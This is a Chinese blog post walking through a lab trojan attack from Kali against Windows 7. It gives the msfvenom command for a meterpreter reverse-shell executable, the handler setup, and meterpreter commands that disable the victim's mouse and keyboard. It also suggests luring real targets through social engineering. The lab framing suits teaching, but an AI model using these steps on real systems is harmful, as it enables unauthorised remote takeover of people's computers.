记一次简单的木马渗透实战

最新推荐文章于 2024-07-15 10:12:43 发布
最新推荐文章于 2024-07-15 10:12:43 发布
阅读量77 收藏
点赞数 2
分类专栏: 实战 文章标签: linux 安全 windows 网络安全 系统安全 网络攻击模型 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71953083/article/details/134100290
版权

本次实验仅供技术交流。

本次虚拟机实验环境:

kali2021

ip:

windows7

ip:

且此时的windows防火墙是开启的

第一步:使用msfvenom生成一个可以绕过简单防火墙的木马。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.1 lport=5555 -f exe R > /root/shell.exe

然后将此木马移植到Windows上。(实际中可能需要通过社工来引诱对方下载并打开)

在打开此木马前我们还需要监听来接受windows的连接

打开kali的msfconsole

使用exploit/multi/handler 监听模块

设置lhost与lport跟上面的木马一样

还要设置payload:set payload windows/meterpreter

最后开始监听

此时切换到windows上,运行木马程序

然后我们就会发现我们的监听模块已经改变了

当meterpreter出现的时候就代表我们接收到了靶机的连接

此时shell已经完成。并且是管理员权限。(获取到的用户权限与运行木马程序的用户有关)

我们也可以在meterpreter这个阶段禁用靶机键盘鼠标

uictl disable mouse -->禁用鼠标

uictl disable keyboard -->禁用键盘

还有很多操控对方电脑的命令,在这里不一一赘述了。

那么最终实验成功。

小结:这只是一个简单的免杀方法,因为对方系统太低,防火墙安全系数太低,我们的木马程序在移植到靶机电脑上和运行的时候防火墙都没有进行删除报错,也就证明我们的免杀针对这个防火墙成功了。

ps:这是本人第一篇博客,有错误之处还请见谅。感谢。

Melancholy_x
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
一次详细的实战渗透
蚁景网安学院
11-03 2189
一次授权的渗透测试,过程比较详细,充满了巧合,也算比较有意思,直接录一下。整体来说难度不大,没有域,难点在免杀,能拿报表系统是巧合,转发上线没意外,似乎内网环境比较大。
一次渗透实战
crowsec
01-26 937
微信公众号:乌鸦安全 扫取二维码获取更多信息! 更新时间:2021.05.14 01 前提 在早些时候看到先知上有一篇关于thinkphp rce的实战文章 https://xz.aliyun.com/t/6267 于是顺着师傅的思路也来试试 从网上顺利找到的某一个相似的站点,然后就按照师傅的思路来了 02geshell之路 通过报错的方式发现了当前的版本为 ThinkPHPV5.0.23 通过师傅的思路,先去找phpinfo界面 http:/...
一次渗透测试实战
zhangge3663的博客
11-02 1386
0X01 突破边界拿下shell 周末在家闲着没事突然就想搞事情了,然后使用Google hack语法输入inurl:xxx.xxx.xxx/upload批量搜索可能存在上传点的网站,试了好几个最后找到一个可利用的上传点。 注:涉及敏感信息,图片仅供参考,具体内容自行填充。 0X02 反弹shell&提权 Linux下需要把shell反弹出来以方便我们操作,但是目标主机上既没有nc也没有python,查询相关资料后尝试了一下利用bash弹shell。需要一台公网服务器,使用命令ba.
一次渗透实战【转】
时光凉春衫薄的博客
07-10 5580
一次渗透实战【转】 信息收集 用dirsearch扫了一波目录没有发现什么东西 直接用主站域名解析的ip访问发现主站是挂有cdn的 subDomainsBrute 扫描子域名 其中一个子域没挂CDN,由此找到网站的真实ip 得到真实ip后nmap扫描发现8099端口有个未知应用 访问发现是个WEB服务,一个登陆界面漏洞利用 趁nmap还在工作的时候,简单浏览了下网站的功能,伪静态,整个网站也没...
一次渗透实战.pdf
08-14
一次渗透实战教程,里面详细载了渗透实战过程,通过漏洞概述、漏洞说明,是学员有清晰认识。
冰河的渗透实战-冰河.pdf
05-18
冰河整理的全网首个开源的以实战案例为背景的渗透实战,全书共442页,共计37万字(不计空格)。整本书的内容涵盖:Kali基础、渗透工具、木马制作、钓鱼链接生成、爆破密码、内存溢出攻击、web渗透、数据提权、...
录一次国外某内网的实战过程.pdf
11-25
WEB安全、内网渗透
一次不完整的渗透1
08-08
一次不完整的渗透测试 本文将详细介绍一次渗透测试的过程,从目标选择到最终的提权过程。该测试的目标是一个理工大学的网站,使用 phpCMS 3.0 版本搭建。 首先,对目标进行了大致的踩点,查看网站的外观和结构。...
一次BIGIP Configuration Utility渗透.pdf
04-22
一次BIGIP Configuration Utility渗透.pdf
【持续集成_05课_Linux部署SonarQube及结合开发项目部署】
weixin_42333261的博客
07-12 170
前置条件:sonarQube不能使用root账号进行启动,所以需要创建普通用户及。3)CMD上传qube文件-不能传到home路径下哦。2)添加用户、组名、密码。4)检查并解压上传的包。
linux的学习(四):磁盘,进程,定时,软件包的相关命令
weixin_45037073的博客
07-14 814
关于磁盘管理,进程管理,定时任务,软件包管理的命令的使用。
Linux 安装 Docker Compose
m0_63004677的博客
07-12 313
Linux 系统安装 Docker Compose
【Linux】 GCC/G++与Makefile使用
Long_kin的博客
07-11 992
收藏向 使用解析
Linux —— 进程间通信
学习C++的小陈同学
07-11 988
本篇整理了关于进程间通信的内容,以及详解的介绍了两种进程间通信的方式,以及相关的接口和代码演练
Linux笔之shell终端命令后显示指定行数的grep和head
小勇博客
07-14 455
在Linux中,grep命令和head命令常用于文本处理。grep命令用于搜索文本中的特定模式,而head命令用于显示文件的开头部分。了解如何结合这两个命令(例如使用管道)可以帮助你更高效地处理和查看文本数据。grep -A选项用于在匹配到的行之后显示指定数量的行。例如,将显示匹配到的行及其后面的三行。选项用于显示文件的前n行。例如,将显示file.txt的前五行。
【Linux 线程】线程的基本概念、LWP的理解
Hou_lang_LJ的博客
07-10 418
🐧① Linux 线程的基本概念;
【Linux】centos7安装PHP7.4报错:libzip版本过低
m0_52985087的博客
07-12 328
原因:当前服务器libzip的版本小于0.11比较低,需要更新升级,而且libzip升级版本不能是1.3.1,1.7.0的。安装完成后,查看是否存在/usr/local/lib/pkgconfig目录,如果存在,验证是否卸载成功:rpm -qa|grep libzip,如无输出信息则卸载成功。也可以直接在download后直接拼接要下载的libzip的版本。注意:只是在当前的shell会话中设置了这个环境变量。验证libzip:whereis libzip。查看服务器上libzip的版本。
第一节Linux常见指令
最新发布
2202_75331338的博客
07-15 537
tail命令从指定点开始将文件写到标准输出,使用tail命令的 -f 选项可以方便的查阅正在改变的日志文件,tail -f filename 会把 filename 里最尾部的内容显示在屏幕上,并且不但刷新,使你看到最新的文件内容。说明:cp指令用于复制文件或目录,如同时指定两个以上的文件或目录,且最后的目的地是一个已经存在的目录,则它会把前面指定的所有文件或目录复制到此目录中,若同时指定多个文件或目录,而最后的目的地并非一个已存在的目录,则会出现错误信息。公历是选择国际通用的历法,又称格列历,通称阳历。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值